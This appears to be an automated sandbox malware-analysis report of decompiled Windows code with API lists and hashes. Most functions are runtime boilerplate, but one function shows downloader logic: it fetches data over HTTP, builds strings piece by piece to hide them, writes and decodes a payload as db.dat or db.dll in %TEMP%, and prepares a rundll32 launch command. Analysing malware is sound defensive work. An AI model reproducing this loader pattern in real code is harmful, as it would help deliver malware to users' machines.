                                                            			E00403904(intOrPtr _a4) {
                                                            				void* _t2;
                                                            				void* _t3;
                                                            				void* _t4;
                                                            				void* _t5;
                                                            				void* _t8;
                                                            
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(_a4);
                                                            				_t2 = E00403836(_t3, _t4, _t5, _t8); // executed
                                                            				return _t2;
                                                            			}








                                                            0x00403904
                                                            0x00403906
                                                            0x00403908
                                                            0x0040390c
                                                            0x00403914

                                                            APIs
                                                            • _doexit.LIBCMT ref: 0040390C
                                                              • Part of subcall function 00403836: __lock.LIBCMT ref: 00403844
                                                              • Part of subcall function 00403836: __decode_pointer.LIBCMT ref: 00403873
                                                              • Part of subcall function 00403836: __decode_pointer.LIBCMT ref: 00403880
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: __decode_pointer$__lock_doexit
                                                            • String ID:
                                                            • API String ID: 3276244213-0
                                                            • Opcode ID: 44ea3af290a5c0fced421c48bee69f607f8ea4075bd654cc3defe53151bfea1d
                                                            • Instruction ID: 66755315c0f1c1fd9d05dc6c38d0ad6e5274e01c061bfe93bc0f52b7166101c4
                                                            • Opcode Fuzzy Hash: 44ea3af290a5c0fced421c48bee69f607f8ea4075bd654cc3defe53151bfea1d
                                                            • Instruction Fuzzy Hash: 53A0243354430035D53035007C03F0437401740F00FF0C0747504341D071751314C40F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 85%
                                                            			E0040158C(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                            				intOrPtr _v0;
                                                            				void* _v804;
                                                            				intOrPtr _v808;
                                                            				intOrPtr _v812;
                                                            				intOrPtr _t6;
                                                            				intOrPtr _t11;
                                                            				intOrPtr _t12;
                                                            				intOrPtr _t13;
                                                            				long _t17;
                                                            				intOrPtr _t21;
                                                            				intOrPtr _t22;
                                                            				intOrPtr _t25;
                                                            				intOrPtr _t26;
                                                            				intOrPtr _t27;
                                                            				intOrPtr* _t31;
                                                            				void* _t34;
                                                            
                                                            				_t27 = __esi;
                                                            				_t26 = __edi;
                                                            				_t25 = __edx;
                                                            				_t22 = __ecx;
                                                            				_t21 = __ebx;
                                                            				_t6 = __eax;
                                                            				_t34 = _t22 -  *0x40f020; // 0xebf16b9c
                                                            				if(_t34 == 0) {
                                                            					asm("repe ret");
                                                            				}
                                                            				 *0x410198 = _t6;
                                                            				 *0x410194 = _t22;
                                                            				 *0x410190 = _t25;
                                                            				 *0x41018c = _t21;
                                                            				 *0x410188 = _t27;
                                                            				 *0x410184 = _t26;
                                                            				 *0x4101b0 = ss;
                                                            				 *0x4101a4 = cs;
                                                            				 *0x410180 = ds;
                                                            				 *0x41017c = es;
                                                            				 *0x410178 = fs;
                                                            				 *0x410174 = gs;
                                                            				asm("pushfd");
                                                            				_pop( *0x4101a8);
                                                            				 *0x41019c =  *_t31;
                                                            				 *0x4101a0 = _v0;
                                                            				 *0x4101ac =  &_a4;
                                                            				 *0x4100e8 = 0x10001;
                                                            				_t11 =  *0x4101a0; // 0x0
                                                            				 *0x41009c = _t11;
                                                            				 *0x410090 = 0xc0000409;
                                                            				 *0x410094 = 1;
                                                            				_t12 =  *0x40f020; // 0xebf16b9c
                                                            				_v812 = _t12;
                                                            				_t13 =  *0x40f024; // 0x140e9463
                                                            				_v808 = _t13;
                                                            				 *0x4100e0 = IsDebuggerPresent();
                                                            				_push(1);
                                                            				E004045BD(_t14);
                                                            				SetUnhandledExceptionFilter(0);
                                                            				_t17 = UnhandledExceptionFilter(0x40c1c0);
                                                            				if( *0x4100e0 == 0) {
                                                            					_push(1);
                                                            					E004045BD(_t17);
                                                            				}
                                                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                            			}



















                                                            0x0040158c
                                                            0x0040158c
                                                            0x0040158c
                                                            0x0040158c
                                                            0x0040158c
                                                            0x0040158c
                                                            0x0040158c
                                                            0x00401592
                                                            0x00401594
                                                            0x00401594
                                                            0x00401a25
                                                            0x00401a2a
                                                            0x00401a30
                                                            0x00401a36
                                                            0x00401a3c
                                                            0x00401a42
                                                            0x00401a48
                                                            0x00401a4f
                                                            0x00401a56
                                                            0x00401a5d
                                                            0x00401a64
                                                            0x00401a6b
                                                            0x00401a72
                                                            0x00401a73
                                                            0x00401a7c
                                                            0x00401a84
                                                            0x00401a8c
                                                            0x00401a97
                                                            0x00401aa1
                                                            0x00401aa6
                                                            0x00401aab
                                                            0x00401ab5
                                                            0x00401abf
                                                            0x00401ac4
                                                            0x00401aca
                                                            0x00401acf
                                                            0x00401adb
                                                            0x00401ae0
                                                            0x00401ae2
                                                            0x00401aea
                                                            0x00401af5
                                                            0x00401b02
                                                            0x00401b04
                                                            0x00401b06
                                                            0x00401b0b
                                                            0x00401b1f

                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32 ref: 00401AD5
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00401AEA
                                                            • UnhandledExceptionFilter.KERNEL32(0040C1C0), ref: 00401AF5
                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00401B11
                                                            • TerminateProcess.KERNEL32(00000000), ref: 00401B18
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                            • String ID:
                                                            • API String ID: 2579439406-0
                                                            • Opcode ID: 4680c75607d7577f34d6963ebdb382a5457bef44eca2429c131e247a8cb8d2a8
                                                            • Instruction ID: 95bf7be63045225ff91cd778832c0e9476504d7f9fd5b569df8d05804f655771
                                                            • Opcode Fuzzy Hash: 4680c75607d7577f34d6963ebdb382a5457bef44eca2429c131e247a8cb8d2a8
                                                            • Instruction Fuzzy Hash: BD21BFB4940304EFD751DF64FD85B853BB0BB08314F40823AEA09A62A1E7BA55C4CF5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 88%
                                                            			E0040798E() {
                                                            				signed int _v8;
                                                            				char _v16;
                                                            				void* __esi;
                                                            				signed int _t8;
                                                            				intOrPtr* _t15;
                                                            				intOrPtr _t16;
                                                            				char _t20;
                                                            				intOrPtr _t22;
                                                            				intOrPtr _t23;
                                                            				signed int _t24;
                                                            				int _t25;
                                                            				signed int _t27;
                                                            
                                                            				_t8 =  *0x40f020; // 0xebf16b9c
                                                            				_v8 = _t8 ^ _t27;
                                                            				_t24 = 0;
                                                            				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v16, 7) == 0) {
                                                            					L4:
                                                            					_t25 = GetACP();
                                                            				} else {
                                                            					_t20 = _v16;
                                                            					_t15 =  &_v16;
                                                            					if(_t20 == 0) {
                                                            						goto L4;
                                                            					} else {
                                                            						do {
                                                            							_t15 = _t15 + 1;
                                                            							_t24 = _t24 * 0xa + _t20 - 0x30;
                                                            							_t20 =  *_t15;
                                                            						} while (_t20 != 0);
                                                            						if(_t24 == 0) {
                                                            							goto L4;
                                                            						}
                                                            					}
                                                            				}
                                                            				return E0040158C(_t25, _t16, _v8 ^ _t27, _t22, _t23, _t25);
                                                            			}















                                                            0x00407994
                                                            0x0040799b
                                                            0x0040799f
                                                            0x004079bb
                                                            0x004079dc
                                                            0x004079e2
                                                            0x004079bd
                                                            0x004079bd
                                                            0x004079c2
                                                            0x004079c5
                                                            0x00000000
                                                            0x004079c7
                                                            0x004079c7
                                                            0x004079cd
                                                            0x004079ce
                                                            0x004079d2
                                                            0x004079d4
                                                            0x004079da
                                                            0x00000000
                                                            0x00000000
                                                            0x004079da
                                                            0x004079c5
                                                            0x004079f2

                                                            APIs
                                                            • GetThreadLocale.KERNEL32 ref: 004079A1
                                                            • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 004079B3
                                                            • GetACP.KERNEL32 ref: 004079DC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Locale$InfoThread
                                                            • String ID:
                                                            • API String ID: 4232894706-0
                                                            • Opcode ID: d9941fd1adb6fe47d3b84eded022188f17d0a95e4d665cfb3c79fe0f3a7ca5e7
                                                            • Instruction ID: d183e5ce8bfd03808df9941a685c8502e29c53e435c0df6e02fd4a63ca2beaa2
                                                            • Opcode Fuzzy Hash: d9941fd1adb6fe47d3b84eded022188f17d0a95e4d665cfb3c79fe0f3a7ca5e7
                                                            • Instruction Fuzzy Hash: EDF0C831D04228EFEB219BB499556EF77A4AB05B40B00417ADC41F7280D6346D09CBE9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 37%
                                                            			E00407DEA(void* __eax, void* __ebx, void* __edx) {
                                                            				_Unknown_base(*)()* _t8;
                                                            
                                                            				 *((intOrPtr*)(__edx + __ebx - 1)) =  *((intOrPtr*)(__edx + __ebx - 1)) + __edx;
                                                            				_t8 = SetUnhandledExceptionFilter(E0040304B());
                                                            				 *0x410c3c = 0;
                                                            				return _t8;
                                                            			}




                                                            0x00407def
                                                            0x00407dff
                                                            0x00407e05
                                                            0x00407e0c

                                                            APIs
                                                            • __decode_pointer.LIBCMT ref: 00407DF8
                                                              • Part of subcall function 0040304B: TlsGetValue.KERNEL32(?,004030D2,?,?,00401B60,00401612), ref: 00403058
                                                              • Part of subcall function 0040304B: TlsGetValue.KERNEL32(00000004,?,?,00401B60,00401612), ref: 0040306F
                                                              • Part of subcall function 0040304B: RtlDecodePointer.NTDLL(?,?,?,00401B60,00401612), ref: 004030A2
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00407DFF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Value$DecodeExceptionFilterPointerUnhandled__decode_pointer
                                                            • String ID:
                                                            • API String ID: 3433037573-0
                                                            • Opcode ID: 8b09cf5b1d281532ffb97b8283969e1f6be09899a8b043c20a5e4947f6f15768
                                                            • Instruction ID: b384e89960f4d02eca1f615e29a76eafc12a2951546bdf11efc83c3067051462
                                                            • Opcode Fuzzy Hash: 8b09cf5b1d281532ffb97b8283969e1f6be09899a8b043c20a5e4947f6f15768
                                                            • Instruction Fuzzy Hash: D9C08C704382888BC32867BA5ACC38E3E049703600F4086BA908088082EAFC80CCCFA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 89%
                                                            			E004071DC(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, int _a4) {
                                                            				signed int _v8;
                                                            				char _v10;
                                                            				char _v16;
                                                            				signed int _t7;
                                                            				signed int _t10;
                                                            				signed int _t12;
                                                            				intOrPtr _t14;
                                                            				intOrPtr _t18;
                                                            				intOrPtr _t19;
                                                            				intOrPtr _t20;
                                                            				signed int _t21;
                                                            
                                                            				_t20 = __esi;
                                                            				_t19 = __edi;
                                                            				_t18 = __edx;
                                                            				_t14 = __ebx;
                                                            				_t7 =  *0x40f020; // 0xebf16b9c
                                                            				_v8 = _t7 ^ _t21;
                                                            				_v10 = 0;
                                                            				_t10 = GetLocaleInfoA(_a4, 0x1004,  &_v16, 6);
                                                            				if(_t10 != 0) {
                                                            					_t12 = E00407164( &_v16);
                                                            				} else {
                                                            					_t12 = _t10 | 0xffffffff;
                                                            				}
                                                            				return E0040158C(_t12, _t14, _v8 ^ _t21, _t18, _t19, _t20);
                                                            			}














                                                            0x004071dc
                                                            0x004071dc
                                                            0x004071dc
                                                            0x004071dc
                                                            0x004071e2
                                                            0x004071e9
                                                            0x004071fa
                                                            0x004071fe
                                                            0x00407206
                                                            0x00407211
                                                            0x00407208
                                                            0x00407208
                                                            0x00407208
                                                            0x00407222

                                                            APIs
                                                            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000006,?,?,?,?,?,?,00000000), ref: 004071FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID:
                                                            • API String ID: 2299586839-0
                                                            • Opcode ID: 1d240fee1b7d8aebe584d8999fc1d73975b58e5ee6b7f811cf08394f0de9266e
                                                            • Instruction ID: 145edfe4598dcb4fa6caf2b76cf0490bc41e6c14005d78a16fa768ceeb522f39
                                                            • Opcode Fuzzy Hash: 1d240fee1b7d8aebe584d8999fc1d73975b58e5ee6b7f811cf08394f0de9266e
                                                            • Instruction Fuzzy Hash: C3E09B30E08308BADB00DBF4D845B9D77B8AF48718F5041BEF911FA2C1D674AA049A5A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 57%
                                                            			E0040B270(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                            				void* _v8;
                                                            				char _v12;
                                                            				long _v16;
                                                            				intOrPtr _v20;
                                                            				char _v24;
                                                            				char _v28;
                                                            				char _v32;
                                                            				intOrPtr _v44;
                                                            				signed short _v52;
                                                            				char _v56;
                                                            				signed int _v60;
                                                            				signed int _v64;
                                                            				char _v67;
                                                            				char _v68;
                                                            				char _v69;
                                                            				char _v70;
                                                            				char _v71;
                                                            				char _v72;
                                                            				char _v73;
                                                            				char _v74;
                                                            				char _v75;
                                                            				char _v76;
                                                            				char _v80;
                                                            				char _v84;
                                                            				intOrPtr _v88;
                                                            				intOrPtr _v92;
                                                            				char _v96;
                                                            				char _v97;
                                                            				char _v98;
                                                            				char _v99;
                                                            				char _v100;
                                                            				char _v101;
                                                            				char _v102;
                                                            				char _v103;
                                                            				char _v104;
                                                            				char _v105;
                                                            				char _v106;
                                                            				char _v107;
                                                            				char _v108;
                                                            				short _v628;
                                                            				_Unknown_base(*)()* _v632;
                                                            				intOrPtr _v636;
                                                            				char _v640;
                                                            				intOrPtr _v644;
                                                            				short _v648;
                                                            				_Unknown_base(*)()* _v652;
                                                            				intOrPtr _v656;
                                                            				char _v660;
                                                            				intOrPtr _v664;
                                                            				intOrPtr _v668;
                                                            				char _v672;
                                                            				WCHAR* _v676;
                                                            				char _v680;
                                                            				intOrPtr _v684;
                                                            				intOrPtr _v688;
                                                            				intOrPtr _v692;
                                                            				intOrPtr _v696;
                                                            				intOrPtr _v700;
                                                            				intOrPtr _v704;
                                                            				intOrPtr _v708;
                                                            				intOrPtr _v712;
                                                            				intOrPtr _v716;
                                                            				intOrPtr _v720;
                                                            				short _v724;
                                                            				intOrPtr _v728;
                                                            				intOrPtr _v732;
                                                            				intOrPtr _v736;
                                                            				intOrPtr _v740;
                                                            				intOrPtr _v744;
                                                            				intOrPtr _v748;
                                                            				intOrPtr _v752;
                                                            				intOrPtr _v756;
                                                            				signed int _t157;
                                                            				intOrPtr _t162;
                                                            				intOrPtr* _t163;
                                                            				intOrPtr _t170;
                                                            				intOrPtr _t172;
                                                            				signed int _t181;
                                                            				long _t187;
                                                            				intOrPtr _t212;
                                                            				intOrPtr _t221;
                                                            				intOrPtr _t222;
                                                            				intOrPtr _t246;
                                                            				intOrPtr _t247;
                                                            				intOrPtr _t251;
                                                            				intOrPtr* _t252;
                                                            				long _t263;
                                                            				void* _t271;
                                                            				void* _t272;
                                                            				signed int _t273;
                                                            				void* _t274;
                                                            				intOrPtr* _t275;
                                                            				intOrPtr* _t276;
                                                            
                                                            				_t272 = __esi;
                                                            				_t271 = __edi;
                                                            				_t245 = __edx;
                                                            				_t209 = __ebx;
                                                            				_t157 =  *0x40f020; // 0xebf16b9c
                                                            				_v64 = _t157 ^ _t273;
                                                            				_v12 = 0;
                                                            				_v8 = 0;
                                                            				E004011B0(0x411070, _a4);
                                                            				_v16 =  *0x411068(0x40de0c, 0, 0x17, 0x40ddfc,  &_v8);
                                                            				if(_v16 >= 0) {
                                                            					_t246 =  *0x40fcd8; // 0x0
                                                            					_v740 = _t246;
                                                            					_t162 =  *0x40fcdc; // 0x0
                                                            					_v736 = _t162;
                                                            					_t212 =  *0x40fce0; // 0x80020004
                                                            					_v732 = _t212;
                                                            					_t247 =  *0x40fce4; // 0x0
                                                            					_v728 = _t247;
                                                            					_t275 = _t274 - 0x10;
                                                            					_t163 = _t275;
                                                            					 *_t163 = _v740;
                                                            					 *((intOrPtr*)(_t163 + 4)) = _v736;
                                                            					 *((intOrPtr*)(_t163 + 8)) = _v732;
                                                            					 *((intOrPtr*)(_t163 + 0xc)) = _v728;
                                                            					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *_v8 + 0x24))))(_v8, L"GET", E00401540(0x411070));
                                                            					__eflags = _v16;
                                                            					if(_v16 >= 0) {
                                                            						_t221 =  *0x40fcd8; // 0x0
                                                            						_v756 = _t221;
                                                            						_t251 =  *0x40fcdc; // 0x0
                                                            						_v752 = _t251;
                                                            						_t172 =  *0x40fce0; // 0x80020004
                                                            						_v748 = _t172;
                                                            						_t222 =  *0x40fce4; // 0x0
                                                            						_v744 = _t222;
                                                            						_t276 = _t275 - 0x10;
                                                            						_t252 = _t276;
                                                            						 *_t252 = _v756;
                                                            						 *((intOrPtr*)(_t252 + 4)) = _v752;
                                                            						 *((intOrPtr*)(_t252 + 8)) = _v748;
                                                            						 *((intOrPtr*)(_t252 + 0xc)) = _v744;
                                                            						_v16 =  *((intOrPtr*)( *((intOrPtr*)( *_v8 + 0x34))))(_v8);
                                                            						__eflags = _v16;
                                                            						if(_v16 >= 0) {
                                                            							_v20 =  *((intOrPtr*)( *((intOrPtr*)( *_v8 + 0x38))))(_v8,  &_v24);
                                                            							__eflags = _v16;
                                                            							if(_v16 >= 0) {
                                                            								__eflags = _v24 - 0xc8;
                                                            								if(_v24 == 0xc8) {
                                                            									E00401440(__ebx, _v8,  &_v52);
                                                            									_t181 = _v52 & 0x0000ffff;
                                                            									__eflags = _t181 - 0x2011;
                                                            									if(_t181 == 0x2011) {
                                                            										__imp__#17(_v44);
                                                            										_v60 = _t181;
                                                            										__eflags = _v60 - 1;
                                                            										if(_v60 == 1) {
                                                            											__imp__#20(_v44, 1,  &_v56);
                                                            											__imp__#19(_v44, 1,  &_v28);
                                                            											_v28 = _v28 + 1;
                                                            											__imp__#23(_v44,  &_v32);
                                                            											_v676 = 0;
                                                            											_v96 = 0x620064;
                                                            											_v92 = 0x64002e;
                                                            											_v88 = 0x740061;
                                                            											_v84 = 0;
                                                            											_v672 = 0x620064;
                                                            											_v668 = 0x64002e;
                                                            											_v664 = 0x6c006c;
                                                            											_v660 = 0;
                                                            											__eflags = _a8 - 1;
                                                            											if(_a8 != 1) {
                                                            												_v676 =  &_v672;
                                                            											} else {
                                                            												_v676 =  &_v96;
                                                            											}
                                                            											_v648 = 0x450054;
                                                            											_v644 = 0x50004d;
                                                            											_v640 = 0;
                                                            											_t187 = GetEnvironmentVariableW( &_v648,  &_v628, 0x104);
                                                            											__eflags = _t187;
                                                            											if(_t187 != 0) {
                                                            												lstrcatW( &_v628, "\\");
                                                            												lstrcatW( &_v628, _v676);
                                                            												_v676 =  &_v628;
                                                            											}
                                                            											_v656 = E0040B250();
                                                            											__eflags = _a8 - 2;
                                                            											if(_a8 == 2) {
                                                            												_v724 = 0x750072;
                                                            												_v720 = 0x64006e;
                                                            												_v716 = 0x6c006c;
                                                            												_v712 = 0x320033;
                                                            												_v708 = 0x65002e;
                                                            												_v704 = 0x650078;
                                                            												_v700 = 0x220020;
                                                            												_v696 = 0x730025;
                                                            												_v692 = 0x2c0022;
                                                            												_v688 = 0x70006f;
                                                            												_v684 = 0x6e0065;
                                                            												_v680 = 0;
                                                            												wsprintfW(0x410c50,  &_v724, _v676);
                                                            												_t276 = _t276 + 0xc;
                                                            											}
                                                            											_v76 = 0x57;
                                                            											_v75 = 0x72;
                                                            											_v74 = 0x69;
                                                            											_v73 = 0x74;
                                                            											_v72 = 0x65;
                                                            											_v71 = 0x46;
                                                            											_v70 = 0x69;
                                                            											_v69 = 0x6c;
                                                            											_v68 = 0x65;
                                                            											_v67 = 0;
                                                            											_v108 = 0x43;
                                                            											_v107 = 0x6c;
                                                            											_v106 = 0x6f;
                                                            											_v105 = 0x73;
                                                            											_v104 = 0x65;
                                                            											_v103 = 0x48;
                                                            											_v102 = 0x61;
                                                            											_v101 = 0x6e;
                                                            											_v100 = 0x64;
                                                            											_v99 = 0x6c;
                                                            											_v98 = 0x65;
                                                            											_v97 = 0;
                                                            											_t124 =  &_v76; // 0x57
                                                            											_v652 = GetProcAddress(E0040B090(), _t124);
                                                            											_t126 =  &_v108; // 0x43
                                                            											_v632 = GetProcAddress(E0040B090(), _t126);
                                                            											_v636 = E0040B1B0(_t209, _t126, _t271, _t272, __eflags, _v676);
                                                            											__eflags = _v636 - 0xffffffff;
                                                            											if(_v636 != 0xffffffff) {
                                                            												__eflags = _a8 - 2;
                                                            												if(_a8 != 2) {
                                                            													_t263 = _v28 - _v56;
                                                            													__eflags = _t263;
                                                            													_v652(_v636, _v32, _t263,  &_v80, 0);
                                                            												} else {
                                                            													E0040AED0(_t194, _v28 - _v56 - 0x1751, _v32 + 0x1751, _v28 - _v56 - 0x1751);
                                                            													_v652(_v636, _v32 + 0x1751, _v28 - _v56 - 0x1751,  &_v80, 0);
                                                            												}
                                                            												_v632(_v636);
                                                            												_v12 = 1;
                                                            											}
                                                            											__imp__#24(_v44);
                                                            										}
                                                            									}
                                                            									E004013A0( &_v52);
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					_t245 =  *_v8;
                                                            					 *((intOrPtr*)( *((intOrPtr*)( *_v8 + 8))))(_v8);
                                                            					_t170 = _v12;
                                                            					goto L23;
                                                            				} else {
                                                            					_t170 = _v12;
                                                            					L23:
                                                            					return E0040158C(_t170, _t209, _v64 ^ _t273, _t245, _t271, _t272);
                                                            				}
                                                            			}
































































































                                                            0x0040b270
                                                            0x0040b270
                                                            0x0040b270
                                                            0x0040b270
                                                            0x0040b279
                                                            0x0040b280
                                                            0x0040b283
                                                            0x0040b28a
                                                            0x0040b29a
                                                            0x0040b2b7
                                                            0x0040b2be
                                                            0x0040b2c8
                                                            0x0040b2ce
                                                            0x0040b2d4
                                                            0x0040b2d9
                                                            0x0040b2df
                                                            0x0040b2e5
                                                            0x0040b2eb
                                                            0x0040b2f1
                                                            0x0040b2f7
                                                            0x0040b2fa
                                                            0x0040b302
                                                            0x0040b30a
                                                            0x0040b313
                                                            0x0040b31c
                                                            0x0040b33d
                                                            0x0040b340
                                                            0x0040b344
                                                            0x0040b34a
                                                            0x0040b350
                                                            0x0040b356
                                                            0x0040b35c
                                                            0x0040b362
                                                            0x0040b367
                                                            0x0040b36d
                                                            0x0040b373
                                                            0x0040b379
                                                            0x0040b37c
                                                            0x0040b384
                                                            0x0040b38c
                                                            0x0040b395
                                                            0x0040b39e
                                                            0x0040b3af
                                                            0x0040b3b2
                                                            0x0040b3b6
                                                            0x0040b3ce
                                                            0x0040b3d1
                                                            0x0040b3d5
                                                            0x0040b3db
                                                            0x0040b3e2
                                                            0x0040b3ef
                                                            0x0040b3f4
                                                            0x0040b3f8
                                                            0x0040b3fd
                                                            0x0040b407
                                                            0x0040b40d
                                                            0x0040b410
                                                            0x0040b414
                                                            0x0040b424
                                                            0x0040b434
                                                            0x0040b440
                                                            0x0040b44b
                                                            0x0040b451
                                                            0x0040b45b
                                                            0x0040b462
                                                            0x0040b469
                                                            0x0040b470
                                                            0x0040b477
                                                            0x0040b481
                                                            0x0040b48b
                                                            0x0040b495
                                                            0x0040b49f
                                                            0x0040b4a3
                                                            0x0040b4b6
                                                            0x0040b4a5
                                                            0x0040b4a8
                                                            0x0040b4a8
                                                            0x0040b4bc
                                                            0x0040b4c6
                                                            0x0040b4d0
                                                            0x0040b4ed
                                                            0x0040b4f3
                                                            0x0040b4f5
                                                            0x0040b503
                                                            0x0040b517
                                                            0x0040b523
                                                            0x0040b523
                                                            0x0040b52e
                                                            0x0040b534
                                                            0x0040b538
                                                            0x0040b53e
                                                            0x0040b548
                                                            0x0040b552
                                                            0x0040b55c
                                                            0x0040b566
                                                            0x0040b570
                                                            0x0040b57a
                                                            0x0040b584
                                                            0x0040b58e
                                                            0x0040b598
                                                            0x0040b5a2
                                                            0x0040b5ac
                                                            0x0040b5c9
                                                            0x0040b5cf
                                                            0x0040b5cf
                                                            0x0040b5d2
                                                            0x0040b5d6
                                                            0x0040b5da
                                                            0x0040b5de
                                                            0x0040b5e2
                                                            0x0040b5e6
                                                            0x0040b5ea
                                                            0x0040b5ee
                                                            0x0040b5f2
                                                            0x0040b5f6
                                                            0x0040b5fa
                                                            0x0040b5fe
                                                            0x0040b602
                                                            0x0040b606
                                                            0x0040b60a
                                                            0x0040b60e
                                                            0x0040b612
                                                            0x0040b616
                                                            0x0040b61a
                                                            0x0040b61e
                                                            0x0040b622
                                                            0x0040b626
                                                            0x0040b62a
                                                            0x0040b63a
                                                            0x0040b640
                                                            0x0040b650
                                                            0x0040b665
                                                            0x0040b66b
                                                            0x0040b672
                                                            0x0040b678
                                                            0x0040b67c
                                                            0x0040b6d2
                                                            0x0040b6d2
                                                            0x0040b6e1
                                                            0x0040b67e
                                                            0x0040b695
                                                            0x0040b6c1
                                                            0x0040b6c1
                                                            0x0040b6ee
                                                            0x0040b6f4
                                                            0x0040b6f4
                                                            0x0040b6ff
                                                            0x0040b6ff
                                                            0x0040b414
                                                            0x0040b708
                                                            0x0040b708
                                                            0x0040b3e2
                                                            0x0040b3d5
                                                            0x0040b3b6
                                                            0x0040b710
                                                            0x0040b719
                                                            0x0040b71b
                                                            0x00000000
                                                            0x0040b2c0
                                                            0x0040b2c0
                                                            0x0040b71e
                                                            0x0040b72b
                                                            0x0040b72b

                                                            APIs
                                                              • Part of subcall function 004011B0: SysFreeString.OLEAUT32(?), ref: 004011C7
                                                              • Part of subcall function 004011B0: SysAllocString.OLEAUT32(?), ref: 004011D7
                                                            • SafeArrayGetDim.OLEAUT32(?), ref: 0040B407
                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040B424
                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040B434
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
